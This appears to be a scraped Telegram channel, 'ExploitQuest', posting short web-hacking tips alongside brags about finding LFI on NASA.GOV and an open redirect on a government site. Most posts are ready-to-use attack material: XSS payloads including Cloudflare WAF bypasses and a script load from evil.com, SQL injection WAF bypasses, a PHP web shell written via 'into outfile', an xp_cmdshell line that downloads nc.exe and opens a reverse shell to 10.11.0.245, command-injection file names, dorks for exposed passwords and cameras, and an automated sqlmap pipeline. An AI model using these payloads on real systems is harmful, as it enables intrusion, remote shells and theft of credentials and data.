ExploitQuest

My first vulnerability in NASA: A Local File Inclusion (LFI) vulnerability has been discovered. A Local File Inclusion (LFI/Directory Traversal) vulnerability has been identified on NASA.GOV. This vulnerability allows attackers to exploit insecure file path injection to access sensitive files. On the NASA system

https://x.com/Mr_Dark55/status/1866978916302278931?t=-QcBL7_6M9Ui7gnLtPlB1A&s=19

🔥11👍1👏1

2.43K views20:36

ExploitQuest

I found Open Redirect on a government website gov

🔥8😁3👏1

2.48K views04:49

ExploitQuest

CVE-2024-10793

WP Activity Log Plugin for WordPress
Stored XSS via user_id parameter in all versions prior to 5.2.1

curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \-d 'action=destroy-sessions&user_id=<script>alert("XSS")</script>'

❤5

1.83K views02:03

ExploitQuest

1:13

This media is not supported in your browser

VIEW IN TELEGRAM

3:31

This media is not supported in your browser

VIEW IN TELEGRAM

💻 Disclosed vulnerabilities with bug bounty

1️⃣ Account takeover via Self-XSS
An example of how additional functionality can be used to squeeze account takeover in one click from the useless Self XSS. See the report for more details.

2️⃣ SQL injection in POST request
Identification and exploitation of Union-based SQL injection in POST request based on server responses. More information about exploitation of such vulnerabilities here.

3️⃣ OTP Bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.

#web #xss #sqli

❤7👍3👏2

1.97K views00:04

ExploitQuest

ادخلوا القناة دي بتنشر محتوى رايق
https://t.me/wa3i_tech
https://t.me/wa3i_tech
https://t.me/wa3i_tech

Wa3i | وعي

مرحباً بك في جحيم الوعي

تقدر تشوف باقي قنواتي هنا @iiMrDarkChannels

1.54K views20:53

ExploitQuest

1.42K views14:23

ExploitQuest

Photo

💉 About bypassing protection against SQL injections

Often, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it.

For example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations

( 'AND'1'=1*1 instead of 'AND'1'='1' )

or by adding specific comments like

/*!50000%55nIoN*/ /*!50000%53eLeCt*/

and much more.

For more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.

https://websec.ca/kb/sql_injection

https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/

#web #sqli #bypass #waf

❤6🔥3

1.53K viewsedited 14:27

ExploitQuest

You can use httpx to request any path and see the status code and length and other details on the go, filter, or matcher flags if you want to be more specific.

httpx -path /swagger-api/ -status-code -content-length

🔥8👏2❤1

1.45K views20:30

ExploitQuest

🗂 Forgotten database dumps

Old database dumps can contain all sorts of interesting information - user credentials, configuration settings, API secrets and keys, customer data, and more.

Here is a short but effective checklist to quickly check for forgotten database dumps.

/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
/setup.sql
/sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql

👍4❤1

1.48K views06:12

ExploitQuest

dork:

intitle:"index of" "back.sql" OR "backup.sql" OR "accounts.sql" OR "backups.sql" OR "clients.sql" OR "customers.sql" OR "data.sql" OR "database.sql" OR "database.sqlite" OR "users.sql" OR "db.sql" OR "db.sqlite" OR "db_backup.sql" OR "dbase.sql" OR "dbdump.sql" OR "setup.sql" OR "sqldump.sql" OR "dump.sql" OR "mysql.sql" OR "sql.sql" OR "temp.sql"

👍4❤1

2.83K viewsedited 06:16

ExploitQuest

gov

🔥3👍1

1.49K views06:18

ExploitQuest

💉 Transition from SQL injection to shell or backdoor

▫️Use the “into outfile” command to write to a file:

' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #

▫️Capture the request in Burp Proxy and save it to the post-request file, then run sqlmap :

sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10

▫️reverse netcat shell via mssql injection when xp_cmdshell is available:

1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--

#web #sqli

🔥4❤1

1.57K views13:26

ExploitQuest

📨 Getting other vulnerabilities when downloading a file

When testing file upload functionality in a web application, try setting the file name to the following values:

▫️ ../../../tmp/lol.png -> for Path Traversal vulnerability

▫️ sleep(10)-- -.jpg -> for SQL injection

▫️ <svg onload=alert(document.domain)>.jpg/png -> for XSS

▫️ ; sleep 10; -> for command injection

These payloads may introduce additional vulnerabilities.

#web

👍3👏3❤1

1.52K views13:51

ExploitQuest

🔎 A small selection of interesting Google dorks

▫️ FTP servers and sites

intitle:“index of” inurl:ftp after:2018

▫️Log files with passwords:

allintext:password filetype:log after:2018

▫️Configuration files with passwords:

filetype:env “DB_PASSWORD” after:2018

▫️Lists with email addresses:

filetype:xls inurl:“email.xls”

▫️Open cameras:

inurl:top.htm inurl:currenttime

#web #google

👍5❤3🔥1

1.58K views15:50

ExploitQuest

After exploiting sql injection using the following email address

"'-sleep(5)-'"@mail.local

you can't help but wonder: why the hell did this even get through as a valid email?

In general, the local part (login, before @) of an email can contain special characters according to RFC, if it is enclosed in double quotes. And then - already beloved programming languages deviate a little from what characters can be used.

So, the next magic:

php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);”

It will validate and legally return an email with the attack vector:

"'--><script/src=//evil.com></script>"@example.com

And how the developers display it further is a separate question.

#sqli

🔥5👍1

1.48K views09:51

ExploitQuest

Memes about xss are like this 🤡😂.

😁10

1.43K views09:53

ExploitQuest

⛅️ Bypass Cloudflare WAF

Payloads working at the time of publication for performing XSS on sites protected by Cloudflare WAF.

&lt;img longdesc="src='x'onerror=alert(document.domain);//&gt;&lt;img " src='showme'&gt;

<img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&quot;" src="x" alt="showme">

#web #xss

❤4

1.56K viewsedited 09:56

ExploitQuest

Hacking with an image. PHP payload in an image.

The php-jpeg-injector tool can be used to attack web applications that run a .jpeg image through the PHP GD graphics library.

The tool creates a new .jpeg file with a PHP payload. The infected .jpeg file is executed via PHP's gd library. PHP interprets the payload injected into the jpeg and executes it.

#web

GitHub Link

❤3👍3

1.63K views10:00

ExploitQuest

💉 Find SQL injection on the site with one command

As always, a set of commands is used for these purposes.

Findomain collects the domains of the site being tested.

Httpx checks their availability.

Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains.

Anew will merge Findomain and Waybackurls output and remove duplicates.

Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).

Finally, let's run sqlmap on all identified potentially vulnerable URLs.

findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent

#web #sqli

👍11

1.62K views08:23

About

Blog

Apps

Platform